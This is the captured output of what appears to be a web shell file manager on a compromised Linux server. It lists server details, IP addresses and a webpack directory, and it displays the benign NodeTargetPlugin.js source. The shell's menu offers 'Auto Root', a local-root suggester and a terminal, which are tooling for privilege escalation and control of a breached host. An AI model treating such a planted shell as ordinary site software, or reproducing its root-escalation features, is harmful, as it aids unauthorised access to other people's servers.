Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.217.177.60
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
webpack /
lib /
node /
Delete
Unzip
Name
Size
Permission
Date
Action
CommonJsChunkLoadingPlugin.js
3.58
KB
-rw-rw-r--
2022-08-30 11:49
NodeEnvironmentPlugin.js
1.83
KB
-rw-rw-r--
2022-08-30 11:49
NodeSourcePlugin.js
353
B
-rw-rw-r--
2022-08-30 11:49
NodeTargetPlugin.js
1.17
KB
-rw-rw-r--
2022-08-30 11:49
NodeTemplatePlugin.js
848
B
-rw-rw-r--
2022-08-30 11:49
NodeWatchFileSystem.js
5.75
KB
-rw-rw-r--
2022-08-30 11:49
ReadFileChunkLoadingRuntimeModule.js
9.57
KB
-rw-rw-r--
2022-08-30 11:49
ReadFileCompileAsyncWasmPlugin.js
2.98
KB
-rw-rw-r--
2022-08-30 11:49
ReadFileCompileWasmPlugin.js
2.41
KB
-rw-rw-r--
2022-08-30 11:49
RequireChunkLoadingRuntimeModule.js
7.36
KB
-rw-rw-r--
2022-08-30 11:49
nodeConsole.js
3.79
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Tobias Koppers @sokra */ "use strict"; const ExternalsPlugin = require("../ExternalsPlugin"); /** @typedef {import("../Compiler")} Compiler */ const builtins = [ "assert", "async_hooks", "buffer", "child_process", "cluster", "console", "constants", "crypto", "dgram", "diagnostics_channel", "dns", "dns/promises", "domain", "events", "fs", "fs/promises", "http", "http2", "https", "inspector", "module", "net", "os", "path", "path/posix", "path/win32", "perf_hooks", "process", "punycode", "querystring", "readline", "repl", "stream", "stream/promises", "stream/web", "string_decoder", "sys", "timers", "timers/promises", "tls", "trace_events", "tty", "url", "util", "util/types", "v8", "vm", "wasi", "worker_threads", "zlib", /^node:/, // cspell:word pnpapi // Yarn PnP adds pnpapi as "builtin" "pnpapi" ]; class NodeTargetPlugin { /** * Apply the plugin * @param {Compiler} compiler the compiler instance * @returns {void} */ apply(compiler) { new ExternalsPlugin("node-commonjs", builtins).apply(compiler); } } module.exports = NodeTargetPlugin;